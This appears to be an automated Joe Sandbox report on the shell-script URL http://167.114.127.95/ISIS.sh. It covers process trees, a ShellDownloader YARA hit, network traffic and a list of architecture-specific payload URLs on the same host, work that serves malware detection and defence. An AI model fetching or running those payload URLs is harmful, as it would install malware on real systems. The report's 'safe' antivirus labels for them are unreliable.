Edit tour

Linux Analysis Report
http://167.114.127.95/ISIS.sh

Overview

General Information

Sample URL:	http://167.114.127.95/ISIS.sh
Analysis ID:	1580566
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected ShellDownloader

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Queries the installed Ubuntu/CentOS release

Reads the 'hosts' file potentially containing internal network hosts

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580566
Start date and time:	2024-12-25 08:03:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://167.114.127.95/ISIS.sh
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal48.troj.lin@0/69@16/0

Warnings

Excluded IPs from analysis (whitelisted): 95.100.170.59, 95.100.170.57, 3.164.85.17, 35.244.181.201
Excluded domains from analysis (whitelisted): a19.dscg10.akamai.net, ciscobinary.openh264.org, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, snippets.cdn.mozilla.net
VT rate limit hit for: http://167.114.127.95/ISIS.sh

Process Tree

system is lnxubuntu1

exo-open (PID: 4740, Parent: 4680, MD5: 39c5fa78f1cb3d950b9944f784018d3a) Arguments: exo-open http://167.114.127.95/ISIS.sh

exo-open New Fork (PID: 4747, Parent: 4740)

exo-open New Fork (PID: 4748, Parent: 4747)

exo-helper-1 (PID: 4748, Parent: 1656, MD5: c27a648e34ba5ce625d064af015be147) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 --launch WebBrowser http://167.114.127.95/ISIS.sh

exo-helper-1 New Fork (PID: 4755, Parent: 4748)

sensible-browser (PID: 4755, Parent: 4748, MD5: a5909f49ad9c97574d2b4c49cc24905d) Arguments: /bin/sh /usr/bin/sensible-browser http://167.114.127.95/ISIS.sh

x-www-browser (PID: 4755, Parent: 4748, MD5: 42b33a4578e4a51d8a5d1010c466a9d7) Arguments: /bin/sh /usr/bin/x-www-browser http://167.114.127.95/ISIS.sh

x-www-browser New Fork (PID: 4762, Parent: 4755)

which (PID: 4762, Parent: 4755, MD5: e942f154ef9d9974366551d2d231d936) Arguments: /bin/sh /usr/bin/which /usr/bin/x-www-browser

firefox (PID: 4755, Parent: 4748, MD5: 9a5584c0c2c9ac6b1ba6296513075910) Arguments: /usr/lib/firefox/firefox http://167.114.127.95/ISIS.sh

firefox New Fork (PID: 4779, Parent: 4755)

firefox New Fork (PID: 4783, Parent: 4755)

firefox New Fork (PID: 4797, Parent: 4755)

lsb_release (PID: 4797, Parent: 4755, MD5: 18cba7de7bfedd0d9f027bd1c54cc2b2) Arguments: /usr/bin/python3 -Es /usr/bin/lsb_release -idrc

firefox New Fork (PID: 4817, Parent: 4755)

dbus-launch (PID: 4817, Parent: 4755, MD5: e4a469f27d130d783c21ce9c1c4456c3) Arguments: dbus-launch --autolaunch=11ced2f07072c6ae389b731c5cc84014 --binary-syntax --close-stderr

firefox New Fork (PID: 4884, Parent: 4755)

firefox New Fork (PID: 4885, Parent: 4884)

firefox (PID: 4884, Parent: 4755, MD5: 9a5584c0c2c9ac6b1ba6296513075910) Arguments: /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab

firefox New Fork (PID: 4973, Parent: 4755)

firefox New Fork (PID: 4974, Parent: 4973)

firefox (PID: 4973, Parent: 4755, MD5: 9a5584c0c2c9ac6b1ba6296513075910) Arguments: /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 6115 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab

firefox New Fork (PID: 5011, Parent: 4755)

firefox New Fork (PID: 5012, Parent: 5011)

firefox (PID: 5011, Parent: 4755, MD5: 9a5584c0c2c9ac6b1ba6296513075910) Arguments: /usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 6934 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
/tmp/mozilla_james0/uNEX60sH.sh.part	JoeSecurity_ShellDownloader	Yara detected ShellDownloader	Joe Security
/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/DEC154D3398A604E855E9460291AFC7DD2F49D3F	JoeSecurity_ShellDownloader	Yara detected ShellDownloader	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: /usr/lib/firefox/firefox (PID: 4755)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.127.95

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: 3RFpl8rVF1YDHCZlhxUbwQ==Connection: keep-alive, UpgradePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: HFyf3WrBS00zoqbXYE09qw==Connection: keep-alive, UpgradePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: ofHqArSBqY+ooDxDEZfg4w==Connection: keep-alive, UpgradePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: XoH07eatCgUjuFbAxb5EEg==Connection: keep-alive, UpgradePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: TyNYcaSXRAv88bBjN+shZA==Connection: keep-alive, UpgradePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
Source: global traffic	HTTP traffic detected: GET /ISIS.sh HTTP/1.1Host: 167.114.127.95User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1

Source: global traffic

DNS traffic detected: DNS query: push.services.mozilla.com

Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://%(server)s/dummy/blocklist/)signon.autofillForms-signon.rememberSignons9startup.homepage_welc
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://%(server)s/dummy/healthreport/cdatareporting.healthreport.logging.consoleEnabledUdatareportin
Source: A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB.34.dr	String found in binary or memory: http://167.114.127.95/
Source: DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/ISIS.sh
Source: DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/ISIS.shnecko:classified1strongly-framed1request-methodGETresponse-headHTTP/1.1
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/a-r.m-4.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/a-r.m-5.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/a-r.m-6.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/a-r.m-7.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/i-5.8-6.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/m-6.8-k.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/m-i.p-s.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/m-p.s-l.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/p-p.c-.ISIS;
Source: A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB.34.dr	String found in binary or memory: http://167.114.127.95/predictor::seen1
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/s-h.4-.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/x-3.2-.ISIS;
Source: uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	String found in binary or memory: http://167.114.127.95/x-8.6-.ISIS;
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/I
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/Ihttp://a9.com/-/spec/opensearch/1.1/_http://a9.com/-/spec/opens
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/_
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/_
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: scriptCache-child-new.bin.34.dr	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/2006/addons-blocklist
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul-
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul-getElementsByTagNameNS
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml
Source: scriptCache-new.bin.34.dr	String found in binary or memory: http://www.openh264.org/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://amazon.com
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://baidu.com
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1243643
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://developer.mozilla.org/docs/JavaScript_OS.File
Source: scriptCache-child-new.bin.34.dr	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes/_
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/XPCOM_Interface_Reference/nsIBrowserSearchService#async_war
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://discovery.addons-dev.allizom.org
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://discovery.addons.allizom.orgQ
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://discovery.addons.allizom.orgQhttps://discovery.addons-dev.allizom.org
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://discovery.addons.mozilla.org
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://duckduckgo.com
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://ebay.com
Source: webext.sc.lz4.tmp.34.dr	String found in binary or memory: https://github.com/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://google.com
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/37ecfd08ffee9924609121aaec3f101598f8a84e
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: https://pki.goog/repository/0
Source: 4098689E1EA45FF0094F1C8088E49251FFFF7585.34.dr	String found in binary or memory: https://snippets.cdn.mozilla.net/6/Firefox/66.0.3/20190410113011/Linux_x86_64-gcc3/en-US/release-cck
Source: C389DE279BF5275924497D5B33D1F1900116E591.34.dr, 4098689E1EA45FF0094F1C8088E49251FFFF7585.34.dr	String found in binary or memory: https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json
Source: C389DE279BF5275924497D5B33D1F1900116E591.34.dr	String found in binary or memory: https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.jsonnecko:classified1
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://support.mozilla.org/kb/flash-protected-mode-autodisabled
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://support.mozilla.org/kb/reset-firefox-easily-fix-most-problems
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://twitter.com
Source: cert9.db-journal.34.dr, cert9.db.34.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://www.google.com/policies/privacy/3
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://www.google.com/policies/privacy/3https://www.widevine.com/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://www.widevine.com/
Source: scriptCache-new.bin.34.dr	String found in binary or memory: https://yandex.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43792
Source: unknown	Network traffic detected: HTTP traffic on port 43796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43794
Source: unknown	Network traffic detected: HTTP traffic on port 43788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43796

System Summary

Yara detected ShellDownloader

Source: Yara match	File source: /tmp/mozilla_james0/uNEX60sH.sh.part, type: DROPPED
Source: Yara match	File source: /home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/DEC154D3398A604E855E9460291AFC7DD2F49D3F, type: DROPPED

Source: classification engine

Classification label: mal48.troj.lin@0/69@16/0

Source: /usr/bin/exo-open (PID: 4740)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/bin/exo-open (PID: 4740)	Directory: /home/james/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 4748)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 4748)	Directory: /home/james/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 4748)	Directory: /home/james/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 4748)	Directory: /home/james/.config	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	File: /tmp/firefox_james/.parentlock	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	File: /home/james/.mozilla/firefox/5zxot757.default/.parentlock	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	File: /home/james/.cache/mozilla/firefox/5zxot757.default/.startup-incomplete	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.Xdefaults-ubuntu	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.mime.types	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.mozilla/firefox/5zxot757.default/storage/permanent/chrome/.metadata-v2	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.mailcap	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.mozilla/firefox/5zxot757.default/storage/permanent/chrome/.metadata-v2	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Directory: /home/james/.cache	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4783)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4783)	Directory: /home/james/.drirc	Jump to behavior
Source: /usr/bin/dbus-launch (PID: 4817)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4884)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4973)	Directory: /home/james/.Xauthority	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 5011)	Directory: /home/james/.Xauthority	Jump to behavior

Source: /usr/lib/firefox/firefox (PID: 4755)	Empty hidden file: /tmp/firefox_james/.parentlock	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Empty hidden file: /home/james/.cache/mozilla/firefox/5zxot757.default/.startup-incomplete	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Empty hidden file: /home/james/.mozilla/firefox/5zxot757.default/.parentlock	Jump to behavior

Source: /usr/bin/exo-open (PID: 4740)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 4748)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4755)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4783)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dbus-launch (PID: 4817)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4884)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 4973)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/firefox/firefox (PID: 5011)	Queries kernel information via 'uname':	Jump to behavior

Source: /usr/lib/firefox/firefox (PID: 4797)

Arguments: /usr/bin/lsb_release -> /usr/bin/python3 -Es /usr/bin/lsb_release -idrc

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Hide Artifacts	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Hidden Files and Directories	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://167.114.127.95/ISIS.sh	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%(server)s/dummy/blocklist/)signon.autofillForms-signon.rememberSignons9startup.homepage_welc	0%	Avira URL Cloud	safe
http://167.114.127.95/a-r.m-5.ISIS;	0%	Avira URL Cloud	safe
https://discovery.addons-dev.allizom.org	0%	Avira URL Cloud	safe
http://167.114.127.95/a-r.m-6.ISIS;	0%	Avira URL Cloud	safe
http://167.114.127.95/m-i.p-s.ISIS;	0%	Avira URL Cloud	safe
http://167.114.127.95/x-8.6-.ISIS;	0%	Avira URL Cloud	safe
http://167.114.127.95/m-6.8-k.ISIS;	0%	Avira URL Cloud	safe
http://a9.com/-/spec/opensearch/1.0/I	0%	Avira URL Cloud	safe
http://167.114.127.95/p-p.c-.ISIS;	0%	Avira URL Cloud	safe
http://167.114.127.95/predictor::seen1	0%	Avira URL Cloud	safe
http://a9.com/-/spec/opensearch/1.0/Ihttp://a9.com/-/spec/opensearch/1.1/_http://a9.com/-/spec/opens	0%	Avira URL Cloud	safe
http://167.114.127.95/a-r.m-7.ISIS;	0%	Avira URL Cloud	safe
http://167.114.127.95/x-3.2-.ISIS;	0%	Avira URL Cloud	safe
http://a9.com/-/spec/opensearchdescription/1.1/_	0%	Avira URL Cloud	safe
http://167.114.127.95/i-5.8-6.ISIS;	0%	Avira URL Cloud	safe
https://discovery.addons.allizom.orgQ	0%	Avira URL Cloud	safe
http://%(server)s/dummy/healthreport/cdatareporting.healthreport.logging.consoleEnabledUdatareportin	0%	Avira URL Cloud	safe
http://a9.com/-/spec/opensearch/1.1/_	0%	Avira URL Cloud	safe
http://167.114.127.95/	0%	Avira URL Cloud	safe
http://167.114.127.95/ISIS.shnecko:classified1strongly-framed1request-methodGETresponse-headHTTP/1.1	0%	Avira URL Cloud	safe
http://www.openh264.org/	0%	Avira URL Cloud	safe
http://167.114.127.95/m-p.s-l.ISIS;	0%	Avira URL Cloud	safe
https://discovery.addons.mozilla.org	0%	Avira URL Cloud	safe
http://167.114.127.95/a-r.m-4.ISIS;	0%	Avira URL Cloud	safe
https://discovery.addons.allizom.orgQhttps://discovery.addons-dev.allizom.org	0%	Avira URL Cloud	safe
http://167.114.127.95/s-h.4-.ISIS;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
d228z91au11ukj.cloudfront.net	3.164.85.17	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://push.services.mozilla.com/	false		high
http://167.114.127.95/ISIS.sh	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%(server)s/dummy/blocklist/)signon.autofillForms-signon.rememberSignons9startup.homepage_welc	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://yandex.com	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/a-r.m-5.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
https://discovery.addons-dev.allizom.org	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/policies/privacy/3https://www.widevine.com/	scriptCache-new.bin.34.dr	false		high
http://mozilla.org/MPL/2.0/.	scriptCache-child-new.bin.34.dr	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1238180	scriptCache-new.bin.34.dr	false		high
https://ebay.com	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/m-6.8-k.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/m-i.p-s.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://a9.com/-/spec/opensearch/1.0/I	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/a-r.m-6.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://a9.com/-/spec/opensearchdescription/1.0/	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/predictor::seen1	A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB.34.dr	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/docs/JavaScript_OS.File	scriptCache-new.bin.34.dr	false		high
https://github.com/	webext.sc.lz4.tmp.34.dr	false		high
https://twitter.com	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/x-8.6-.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes/	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/p-p.c-.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://json-schema.org/draft-04/schema#	scriptCache-new.bin.34.dr	false		high
